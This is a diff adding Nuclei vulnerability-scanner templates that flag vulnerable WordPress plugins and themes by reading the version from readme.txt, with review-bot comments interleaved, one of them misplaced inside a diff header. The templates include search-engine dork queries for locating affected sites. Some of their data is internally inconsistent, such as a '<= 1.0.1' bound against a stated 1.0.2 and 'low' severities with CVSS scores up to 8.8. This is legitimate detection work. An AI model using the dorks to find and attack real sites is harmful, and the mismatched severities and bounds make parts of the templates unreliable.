+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tutor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.4')
\ No newline at end of file
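Review bot: The upper bound `compare_versions(version, '<= 2.7.4')` is given without any fixed-in version in the template, and the description ("versions up to, and including, 2.7.4") reads as if no patch existed when it was written; if the nonce check in `addon_enable_disable` was not actually added in the next release, every newer install is silently reported clean. I would record the fixed-in release so the bound can be audited, e.g. a `remediation:` entry under `info` or a comment next to the dsl line such as `# fixed in: <release named in the Wordfence advisory>`. The `words: - "tutor"` matcher is a weak anchor — it accepts any body containing that substring, not specifically this plugin's readme — so the fingerprint effectively rests on the Stable tag regex alone; a more specific readme string would make a false positive less likely.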
diff --git a/poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml b/poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml new file mode 100644 index 0000000000..bd95475138 --- /dev/null +++ b/poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5
+
+info:
+ name: >
+ WP User Profile Avatar <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The WP User Profile Avatar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/af053fdc-e40c-4dfa-8d16-09c72d839031?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2023-6067
+ metadata:
+ fofa-query: "wp-content/plugins/wp-user-profile-avatar/"
+ google-query: inurl:"/wp-content/plugins/wp-user-profile-avatar/"
+ shodan-query: 'vuln:CVE-2023-6067'
+ tags: cve,wordpress,wp-plugin,wp-user-profile-avatar,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-user-profile-avatar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-user-profile-avatar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
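Review bot: The version bound in the dsl matcher, `compare_versions(version, '<= 1.0.1')`, does not agree with the name and description, which both state the plugin is vulnerable in all versions up to and including 1.0.2; as written, a site running 1.0.2 is reported clean. If the advisory text is right, the line should read `- compare_versions(version, '<= 1.0.2')`; if 1.0.2 is in fact the fixed release, then the name and description are the lines to correct instead. Either way the three must agree, because this single comparison is the entire detection.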
diff --git a/poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml b/poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml new file mode 100644 index 0000000000..986f277833 --- /dev/null +++ b/poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb
+
+info:
+ name: >
+ Enfold <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wrapper_class and class Parameters
+ author: topscoder
+ severity: low
+ description: >
+ The Enfold - Responsive Multi-Purpose Theme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wrapper_class’ and 'class' parameters in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/25462492-59d2-44b7-81c3-93ac04a08bcc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5061
+ metadata:
+ fofa-query: "wp-content/themes/enfold/"
+ google-query: inurl:"/wp-content/themes/enfold/"
+ shodan-query: 'vuln:CVE-2024-5061'
+ tags: cve,wordpress,wp-theme,enfold,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/enfold/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "enfold"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml b/poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml
new file mode 100644
index 0000000000..0037419a5f
--- /dev/null
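Review bot: `severity: low` and the trailing `low` tag disagree with `cvss-score: 6.4`, which is Medium on the CVSS v3.1 scale the `cvss-metrics` line uses; I would change them to `severity: medium` and `tags: cve,wordpress,wp-theme,enfold,medium`, or drop the score if the low rating is intentional. Separately, the `words: - "enfold"` check runs against the `style.css` body, and nuclei word matchers are case-sensitive unless `case-insensitive: true` is set, so this relies on the lowercase slug appearing somewhere in the stylesheet header (the `Theme Name:` line is presumably capitalised). Worth confirming against a real Enfold `style.css`, or adding `case-insensitive: true` to that matcher so the template does not miss the theme on a capitalisation detail.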
+++ b/poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5416-b035cee38aeca20c0511efbe55146c96
+
+info:
+ name: >
+ Elementor Website Builder – More than Just a Page Builder <= 3.23.4 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-5416
+ metadata:
+ fofa-query: "wp-content/plugins/elementor/"
+ google-query: inurl:"/wp-content/plugins/elementor/"
+ shodan-query: 'vuln:CVE-2024-5416'
+ tags: cve,wordpress,wp-plugin,elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.23.4')
\ No newline at end of file
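Review bot: The `severity: low` field and the `low` tag do not agree with `cvss-score: 5.4`, which is Medium under the CVSS v3.1 vector listed; `severity: medium` and `tags: cve,wordpress,wp-plugin,elementor,medium` would make the template self-consistent. The description also says the issue was partially patched in 3.23.2, yet `compare_versions(version, '<= 3.23.4')` reports every version in range identically; a one-line note beside the dsl entry, e.g. `# 3.23.2–3.23.4 are only partially affected per the advisory`, would save triage time. The `shodan-query: 'vuln:CVE-2024-5416'` value looks like boilerplate — Shodan's `vuln:` filter is populated from its own banner-based CVE tagging, which is unlikely to cover a WordPress plugin XSS — so I would not rely on it for target discovery.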
diff --git a/poc/cve/CVE-2024-6282.yaml b/poc/cve/CVE-2024-6282.yaml
new file mode 100644
index 0000000000..1ad28ed477
--- /dev/null
+++ b/poc/cve/CVE-2024-6282.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6282
+
+info:
+ name: >
+ Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor <= 2.0.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via data-jltma-wrapper-link Element
+ author: topscoder
+ severity: low
+ description: >
+ The Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-jltma-wrapper-link element in all versions up to, and including 2.0.6.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-6282
+ metadata:
+ fofa-query: "wp-content/plugins/master-addons/"
+ google-query: inurl:"/wp-content/plugins/master-addons/"
+ shodan-query: 'vuln:CVE-2024-6282'
+ tags: cve,wordpress,wp-plugin,master-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/master-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "master-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6.4')
\ No newline at end of file
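Review bot: The two `extractors` entries are identical apart from `internal: true` on the first, and both are named `version`, which reads as a copy-paste rather than a deliberate design; as far as I recall, nuclei exposes a non-internal extractor's value to `dsl` matchers as well, so the internal duplicate looks redundant and a single extractor would do. If the intent is instead to keep the version out of the report while still feeding `compare_versions()`, keep only the `internal: true` entry and say so above it, e.g. `# internal: consumed by compare_versions() only, not reported`. The same duplicated pair appears in every new template hunk of this patch, so the fix belongs in the generator rather than in this file alone.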
diff --git a/poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml b/poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml
new file mode 100644
index 0000000000..e5dd1f11a1
--- /dev/null
+++ b/poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6335-84de910af85c0afe2f599b3df45be46d
+
+info:
+ name: >
+ Tracking Code Manager <= 2.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Tracking Code Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd1fe45-8518-429b-94d3-cc0ea06ca1b4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-6335
+ metadata:
+ fofa-query: "wp-content/plugins/tracking-code-manager/"
+ google-query: inurl:"/wp-content/plugins/tracking-code-manager/"
+ shodan-query: 'vuln:CVE-2024-6335'
+ tags: cve,wordpress,wp-plugin,tracking-code-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tracking-code-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tracking-code-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7618.yaml b/poc/cve/CVE-2024-7618.yaml
new file mode 100644
index 0000000000..6bfe29c0a3
--- /dev/null
+++ b/poc/cve/CVE-2024-7618.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7618
+
+info:
+ name: >
+ Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘content’ parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-7618
+ metadata:
+ fofa-query: "wp-content/plugins/peepso-core/"
+ google-query: inurl:"/wp-content/plugins/peepso-core/"
+ shodan-query: 'vuln:CVE-2024-7618'
+ tags: cve,wordpress,wp-plugin,peepso-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "peepso-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.4.5.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml b/poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml
new file mode 100644
index 0000000000..3fc892bc8b
--- /dev/null
+++ b/poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1
+
+info:
+ name: >
+ WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) <= 1.6.9 - Improper Path Validation to Authenticated (Subscriber+) Arbitrary File Move and Read
+ author: topscoder
+ severity: low
+ description: >
+ The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file movement and reading due to insufficient file path validation in the save_edit_profile_details() function in all versions up to, and including, 1.6.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). This can also lead to the reading of arbitrary files that may contain sensitive information like wp-config.php.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 8.1
+ cve-id: CVE-2024-7626
+ metadata:
+ fofa-query: "wp-content/plugins/delicious-recipes/"
+ google-query: inurl:"/wp-content/plugins/delicious-recipes/"
+ shodan-query: 'vuln:CVE-2024-7626'
+ tags: cve,wordpress,wp-plugin,delicious-recipes,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/delicious-recipes/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "delicious-recipes"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7655.yaml b/poc/cve/CVE-2024-7655.yaml
new file mode 100644
index 0000000000..6e5e06b82d
--- /dev/null
+++ b/poc/cve/CVE-2024-7655.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7655
+
+info:
+ name: >
+ Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ee611-ae81-4736-b4f0-b9d06714da18?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-7655
+ metadata:
+ fofa-query: "wp-content/plugins/peepso-core/"
+ google-query: inurl:"/wp-content/plugins/peepso-core/"
+ shodan-query: 'vuln:CVE-2024-7655'
+ tags: cve,wordpress,wp-plugin,peepso-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "peepso-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.4.5.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml b/poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml
new file mode 100644
index 0000000000..1b25cef619
--- /dev/null
+++ b/poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5
+
+info:
+ name: >
+ HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.34 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update
+ author: topscoder
+ severity: low
+ description: >
+ The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_password' function in all versions up to, and including, 2.5.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set any options that are not explicitly checked as false to an array, including enabling user registration if it has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7721
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:CVE-2024-7721'
+ tags: cve,wordpress,wp-plugin,html5-video-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.34')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml b/poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml
new file mode 100644
index 0000000000..de404f5e99
--- /dev/null
+++ b/poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37
+
+info:
+ name: >
+ HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.32 - Missing Authorization in multiple functions via h5vp_ajax_handler
+ author: topscoder
+ severity: high
+ description: >
+ The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions called via the 'h5vp_ajax_handler' ajax action in all versions up to, and including, 2.5.32. This makes it possible for unauthenticated attackers to call these functions to manipulate data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/908df18e-7178-4d40-becb-86e1a714a7da?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-7727
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:CVE-2024-7727'
+ tags: cve,wordpress,wp-plugin,html5-video-player,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.32')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7770.yaml b/poc/cve/CVE-2024-7770.yaml
new file mode 100644
index 0000000000..3f25f4de91
--- /dev/null
+++ b/poc/cve/CVE-2024-7770.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7770
+
+info:
+ name: >
+ Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress <= 6.5.5 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 6.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted upload permissions by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cae7702-e531-45b9-9131-42edbc073a07?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7770
+ metadata:
+ fofa-query: "wp-content/plugins/file-manager/"
+ google-query: inurl:"/wp-content/plugins/file-manager/"
+ shodan-query: 'vuln:CVE-2024-7770'
+ tags: cve,wordpress,wp-plugin,file-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/file-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "file-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.5.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml b/poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml
new file mode 100644
index 0000000000..7235bf360b
--- /dev/null
+++ b/poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e
+
+info:
+ name: >
+ Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The Advanced WordPress Backgrounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘imageTag’ parameter in all versions up to, and including, 1.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8045
+ metadata:
+ fofa-query: "wp-content/plugins/advanced-backgrounds/"
+ google-query: inurl:"/wp-content/plugins/advanced-backgrounds/"
+ shodan-query: 'vuln:CVE-2024-8045'
+ tags: cve,wordpress,wp-plugin,advanced-backgrounds,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "advanced-backgrounds"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.12.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8241.yaml b/poc/cve/CVE-2024-8241.yaml
new file mode 100644
index 0000000000..e3dc0db594
--- /dev/null
+++ b/poc/cve/CVE-2024-8241.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8241
+
+info:
+ name: >
+ Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute
+ author: topscoder
+ severity: low
+ description: >
